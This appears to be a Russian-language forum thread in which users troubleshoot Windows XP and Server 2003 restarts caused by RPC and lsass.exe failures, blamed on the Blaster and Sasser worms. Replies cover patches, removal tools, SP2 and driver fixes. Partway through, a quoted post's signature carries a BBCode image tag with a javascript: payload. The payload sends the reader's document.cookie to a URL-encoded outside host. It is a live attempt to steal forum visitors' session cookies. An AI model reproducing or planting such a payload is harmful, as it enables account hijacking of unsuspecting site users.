У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса?
Добавлено: У меня тоже этот вирус на компьютере обнаружился. Я поставил себе Norton Antivirus, но невозможно зайти на сайт Symantec и загрузить обновления. Постоянно выдается ошибка о том, что такого адреса нет, или сайт не работает итд. Пробовал как через IE5.8 так и через Mozilla. Другие адреса все работуют, а этот нет. Это тоже из-за вируса? |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
У мня касперский. Обновляется нормально, ток без толку, ни хрена не находит. Качай обновления, должно помочь. Я вот пока сижу... ток Update Rollup 1 не помог, после него ещё кучу заплаток скачал, не знаю, работаю вот пока, но в 2К свой заходить боюсь=). Если опять всё накроется буду держать в курсе....
Ниужели новая чума?!?!?!? Добавлено: Беда!!! Поставил Каспера на полную проверерку, и через 2 минуты всё опять стало глючить!!! Комп просто вырубается и всё!!! |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
cBonD
nikolaik Эта тема возникла потому, что бластер вызывал проблему с перезагрузкой системы, и все шли в ХР с вопросами. Решение проблемы обозначено в самом первом сообщении темы. Для обсуждение вирусов и методов их удаления есть форум Информационная Безопасность. Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Дык не похоже всё это дело на бластер! Говорю хе, сразу вырубается и всё!!! Если в Debug Mode грузиться, то иногда возникает ошибка "Mashine_check_exeption". А воще я вот ща себе ещё раз c: форматнул и вин переставил, ща XP(PE) без SP1, вроде не глючит пока... мож просто в обновлении у мня какая дрянь сидела?... (у мня dial-up, соответственно, ставлю с харда, качать не имеет смысла... =))
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Цитата:
------------------ [img]javAScript :i = new Image();i.src='%68%74%74%70%3A%2F%2F%67%36%2E%72%75%2F%63%67%69%2D%62%69%6E%2F%61%2E%6A%70%67?'+docu ment.cookie[/img] |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Newbie, а у тебя SP1?
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Цитата:
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
При подключении к нету вылетает LSA Shell. Вызывает ошибку и вываливает службу NT Authority, далее, я думаю, все знают. Что делать?
[s]Исправлено: [mzd], 15:55 29-06-2004[/s] |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
[mzd]
А ты самый первый вопрос в теме читал? |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Vadikan
Я не мог до сайта Микрософта достучаться, чтобы узнать насчет этой слжбы, поэтому задал такой вопрос в расчете на помощь советом, а не линком. Я хочел узнать, что это за вирус, который ни Каспер, ни Нортон не ловят... |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
[mzd]
Цитата:
Причина возникновения проблемы Краткое описание червя Утилиты для удаления червя Заплатка, которую надо установить во избежание повторения проблемы. Что еще требуется??? Я не понимаю, сорри. Заражение происходит через открытые порты, без участия пользователя. Заплатки надо вовремя ставить, и не будет проблем. Подпишись на тему Важнейшие обновления системы (прикреплена), и будешь в курсе. Цитата:
2. Линки с ответами есть в первом посте темы. 3. О вирусах надо спрашивать в форуме Информационная Безопасность. Так что не надо, плиз... |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
у меня постояноо появляется вирус Backdoor.r-bot.gen я его удаляю а он снова что сделать помогите
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Привет ребята. Устал. Короче как написано в Вашем первом ответе убил червя Clravom, заплатку поставить на ХР не могу, что-то ругается на язык, но это не проблема, найду другую. Но главное, что только стоит подстыковать сетевой кабель (локалка, эта машина не Интернете), через 2-3 минуты опять останавливается служба RPC. Повторный поиск наличия червя не дает. Пробую включить Бранмауэр, однако выходит сообщение об ошибке "Не удалось запустить дочернюю службу" и встроенный межсетевой экран естественно не включатеся. Очень прошу посоветуйте чего-нибудь. Спасибо. Очень жду.
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Alex51278
Заплатку все-таки поставь, и 90% за то что всё наладится... А на язык может ругаться если у тебя стоит английская винда с MUI, а заплатку ставишь русскую, надо английскую ставить. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Спасибо за внимание! Заплатку поставил, проблема осталась. У меня в сети так заразились 2 машины. Все что я с ними делал одинаково. Т.е. убил червя, поставил заплатку. На одной все стало на свои места, на другой ничего не изменилось. Служба RPC останавливается, бранмауэр не включить. Если отключить кабель локальной сети, то все нормально. Может чё придумаем? Конечно самое простое форматнуть диск, переставить систему и буд-то все, но ведь интересно же...! Заранее благодарен.:up: Blast Добавлено: Спасибо за внимание! Заплатку поставил, проблема осталась. У меня в сети так заразились 2 машины. Все что я с ними делал одинаково. Т.е. убил червя, поставил заплатку. На одной все стало на свои места, на другой ничего не изменилось. Служба RPC останавливается, бранмауэр не включить. Если отключить кабель локальной сети, то все нормально. Может чё придумаем? Конечно самое простое форматнуть диск, переставить систему и буд-то все, но ведь интересно же...! Заранее благодарен.:up: Blast Добавлено: Извините намутил с сообщениями! Но думаю суть ясна. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Привет ребята! А еще за несколько секунд до отключения службы RPC появляется сообщение об ошибке в "LSA Shell (экспортная версия)" и предлогается отправить в М$ отчет об ошибке "для исправления LSA Shell". Я, честно говоря, не знаю,ято это такое. Литературы пока не нашел, но ищу.
Будет момент поделитесь плиз впечатлениями. Спасибо.:o |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Наверное, я тупой! Прочитал весь форум, скачал и Каспер-утиль (CLRAV.COM) и Semantec (FxSasser & FixBlast) - проверка имеет нулевой эффект. Патч на ХР(Pro) от Microsoft встал ОК. Ля-ля-ля, ничего не изменилось - тот же Win\System32\lsass.exe с кодом ошибки и shutdown. А, кстати, FlashGet файло качает в энто время!
|
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Дополнение к 26-08-2004.
Вот уже 4 часа сижу во всемирной помойке без единой перезагрузки. После моего крика отчаяния не подходил к компу 4 суток, сушил мозги. Додумался вот до чего: несколько раз упоминалось, что этот вирус сидит в отдельном файле *.exe с разными именами и запускается из реестра. Включаю RegCleaner и смотрю на секцию "Автозапуск". Среди прочих вижу: запуск проги "ATI2VID.EXE". Типа, дрова для видюхи. Стоп, но у меня на машине встронный Trident! Залажу в список оборудования и смотрю, какие дрова ставил WinXP. Никаких "ATI2VID.EXE" тама нет!. Ну и похерил из реестра все упоминания об этой твари (на свой страх и риск). Также поиском нашёл этот файл в %WinDir%\System32 и ещё какой-то "ATI2VID.PF". Оба снёс к едрене фене. Всё. Заплатка от Microsoft в это время уже стояла, как влитая. Всё это делал в SafeMode. |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Люди! у меня не беда, а трагедия просто!!! Каждые три дня переустанавливать систему – это что-то! ДВА МЕСЯЦА уже длиться вся вот эта ерунда – по 20 перезагрузка при включении компа, и на третий день вся система (ХР) накрывается медным тазом вообще! И теперь еще этот идиотский Isass.exe, которого НЕТУ, когда его ищешь даже в скрытых системных файлах! Никакие антивирусы ничего не показывают! Касперский молчит, все утилиты против этих червей запускаю – и после этого все то же самое!!!!!!! О ужас!:lol: Что же делать?! ПОВЕСИТЬСЯ?!!:gigi:
Добавлено: Люди дорогие!! Это я же, которая хотела повеситься! Боюсь поверить глазам своим, но кажется я все ВЫЛЕЧИЛА!! Поскольку тут много пострадавших, то даю ссылку – откуда я скачала антивирус: http://www.free-help-internet.com/ Там третья надпись – вирус никак не назван, написано, что это вирус, который не дает выйти в интернет и поразил уже каждый 6-ой комп! надо скачать файл sos.rar, около 2 мегов, в который входит сразу все – и инструкция как останавливать перезагрузку вручную, и FixBlast, и заплатка, и еще одна очень важная вещь – проверка порта 5000 и программа, которая его закрывает. После того, как я все это проделала (а FixBlast нашел у меня Sasser и объявил, что уничтожил его), ВПЕРВЫЕ за последние два месяца я включила машину, и ХР загрузилась СРАЗУ (а не с двадцатого раза). И эта фигня с перезагрузкой в течении минуты пока больше не появляется... Советую! |
Oстановка службы RPC, перезагрузка при подключении к Интернету (AUTHORITY\SYSTEM)
Флуд удален
[s]Исправлено: Olegator, 12:41 25-09-2004[/s] |
Все что тут написано перечитал - но...
У меня установлены следующие заплатки (я так думаю что все) на WinXP + SP1: WindowsXP-KB841873-x86-enu WindowsXP-KB840315-x86-enu WindowsXP-KB839645-x86-enu WindowsXP-KB835732-x86-ENU Windows-KB841720-ENU-V4 Cumulative Security Update for Internet Explorer (867801) Все заплатки ставились на неинфицированую машину сразу после установки виндов. Касперский - самое последнее обновление на 03.10.2004. Ни касперский ни другие анивирусы/утилиты вируса не находят. Если отключаю файрвол - процесс svchost занимает 100% загрузки процессора - торомозится все + может произойти перезагрузка. Включать файрвол НЕ МОГУ т.к. из-за него у меня не работает провайдер. (у него такая система уж ничего не поделаешь, а он в нашем городе только один). Что делать? Уже достало... (если честно то уже думаю о перходе на другую ОС) |
Цитата:
|
Флуд удален
[s]Исправлено: Vadikan, 8:48 4-10-2004[/s] Добавлено: Уважаемый, мр.Vadikan. Если вы считаете, что совет ставить в firewall'е блок на out/in траффик svhost.exe, за флуд, то, извините меня, на каком же языке в ваш форум надо писать. |
Проверил все выше сказанное, ничего не нашел, но комп перегружается, что еще может быть, кто сталкивался с такой проблемой?
|
Здрасьте уважаемые почти всю тему прочитал и решил выложить полезный [бесплатный] антивирус:up:
Весит 7.28 KB http://files.avast.com/iavs4pro/setuprus.exe И еще от червей хорошо антивирус Stop! помогает однако за него платить надо Весит 5.76 KB http://www.proantivirus.com/ftp/stop410.exe Советую закачать Stop! так как он первые 30 дней бесплатный ну а если понравится то и заплатить не грех.:) ps: лично я с их помощю 29 червей вывел которые не видел ни Каспер ни Др Вэб. pps: ну а тем у кого есть возможности советую firewall поставить:type: |
Guest 217.23.84.* Цитата:
Продолжайте дискуссию в теме про svchost, плиз. |
У меня было тоже самое. Раздражало до безумия. Стоял FireWall типа Agnitum Outpost. Все было закрыто. Тем не менее такие глюки происходили только при сетевом соединении. Как только его отключал - все проходило.
После установки Windows XP SP2 все исчезло вместе со всеми остальными проблемами (периодическими тормозами, жутким пилением винта и отсутствием возможности спокойно и долго без глюков работать с и без сети). Вот такая история. Хотя ни вируса система не находила, да и антивира не стоит сейчас. FireWall встроенный меня полностью устраивает, так что ставить вместо него Outpost смысла не вижу. |
Понять не могу.
БИОС слетел - частично. 5 разных scvhost.exe Касперский и Нортон - сначала видели, потом перестали. SpyBot, AntiVir Guard тоже несмогли, тоолзы от Symantec глухо. Поставил вчера XP SP2 - все по старому, форматировать все нахрен? |
в том-то и дрянь, что после форматирования раздела С: происходит то же самое, так всё работает отлично, как только цепляю сеть, через минуту обратный отсчёт и перегрузка...
|
bakatum
Видимо, надо перечитать первую страницу темы еще раз. |
Помогите разобраться если можите!
Сервер, на нем Win2003, все патчи установлены, червей не наблюдается, но ежедневно(а то инесколько раз в день) вылетает lsass.exe, и перегружает сервер, Пакет безопасности Kerberos создал исключение. происходит это уже с месяц, причем только при включеном кабелька инета, если работает только локалка, то все нормально до этого ничего подобного не наблюдалось. Фаервол стоит желелзный DLink-604, и на вход открыто только HTTP, я его уже и переставлял, чуть ли с бубном вокруг не бегал, ничего не помогает. На маздае, по этому поводу ничего нет, всеми видами Fx... проверял, ни кто ничего не находит :search: |
Проблема вроде решилась, отключил в проверке подленности IIS крберос и все стало нормально, только вот не понятно почему он не хочет работать?
|
плиз Help этот lsass.exe на сервери Win2003 enterprise edition SP1
очень сильно надоел кажды раз когда в Инет заходишь через 30-40 мин. выходит вот это сообщение с lsass.exe чё делать ваще?? Уже месяц с ним ругаюсь и ни как антивирус не находит качал заплаткии Win 2003 говорит что мол это уже всё стоит и ничё не надо:( конечно нет Firewall, а включен обычный брендмауэр, а толку нет помогите кто чем может... |
Aналогичный вопрос уже задавался на форуме. Воспользуйтесь фильтрами по названию темы в разделе Windows 2000/2003 по lsass.
Результат |
Здраствуйте народ, помогите пожалуйста, у меня тоже очень часто выдается такое сообщение. Я уже и проверял и на вирусы, и даже пробовал весь диск очишать, и Windows переустанавливал, ничего не помогает. Нигде в реестре ниче не появляется, ни новые файлы нигде не создаются, помогите мне пожалуйста. Заранее спасибо.
|
Service Pack 2 стоит? Это старые дыры в Винде. Переустанавливай тысячу раз, если не защищаешься, то будут валить из инета.
|
romacv
В первом сообщении темы также перечислены меры, которые следует предпринять во избежание повторного заражения. |
А сколько весят обновления, для защиты от этого вируса? просто у меня интернет по трафику, если очень большой размер то скачат не смогу.
|
Скачал обновления от заражения вроде бы больше не выдается. :-) Спасибо вам большое за помощь. :-)
|
Я уже не знаю что делать. Програмулина Касперского (ссылка выше) ничего не видит. Сумантек то же самое. Пробывал поставить патч: система говорит, что у нее это уже давно есть, при чем версия посвежее инсталируемой. В Диспетчере программ лишних процесов не встретил. Короче что делать не знаю. Кроме того стоит РЕЙД-масив. Никогда с ним не сталкивался, во этому есть конкретные трудности с тем, чтобы переставить винду. Мож там еще какие-то хитрости есть? У мя Вида 2003 сервер. Уже пересмотрел горы сайтов. Везде одно и то же. и ни чего не помогает
|
Ноутбук ACER Aspire 5920 (C2D T7300, GeForce 8600GT). Проблема с перезагрузкой Windows XP из-за завершения службы RPC, описаная выше. Долго мучался, переустанавливал систему раз 5, пробовал разные сборки Windows XP Zver, ставил даже лицензионную с работы. Эффекта ноль, вылетает даже на голой винде сразу после установки при подключении к интернету. Антивирус NOD32 с последними обновлениями никаких вирусов не обнаруживал. Проблеме помог поиск ответов на зарубежных сайтах. В моем случае причиной проблемы оказался драйвер помощи nVidia nvsvc32.exe, для устранения ошибки нужно переименовать его в папке windows\system32 и перезагрузиться. Месяц живу спокойно - ни одной перезагрузки. Может кому нибудь поможет.
|
Такая же проблема, помог - Spybot - Search & Destroy
|
Здраствуйте! прошу вашей помощи у меня точно такая проблема как здесб описано первое из окошек то которое у меня выскакивает, пытался потупать как описано в теме, не помогло не могу найти это червя и удалить не помогает ни оджна из преведенных там программ, а теперь комп стал до бесконечно перезагружаться, вот сейчас раза с 30 только остановилось и омгу пользоваться, подскажите что делать?
была мною создана одтельная тема, по совету перенес в эту. и только тогда заметил что в ней 14 старниц:) прочел все пробЫвал многое не помогало, но последнее сообщение, советующее Spybot - Search & Destroy, кажетсья помогло, много чего нашло и удалило, в частности и это, кажетсья говорю, кажетсья, потмоу что перезагружаться боюсь, а вдруг нет, и тогда опять бесконечные перезагрузки, вот |
Цитата:
|
это как то мало ободряет, придумал поставить на спящий режим, чтоыб не выключяатсья или перезагружаться и отложить пробы до завтра:). скажи коваман а у тебя спайбот сразу помог, скан удаление и все нету?
|
Цитата:
|
| Время: 11:07. |
Время: 11:07.
© OSzone.net 2001-2025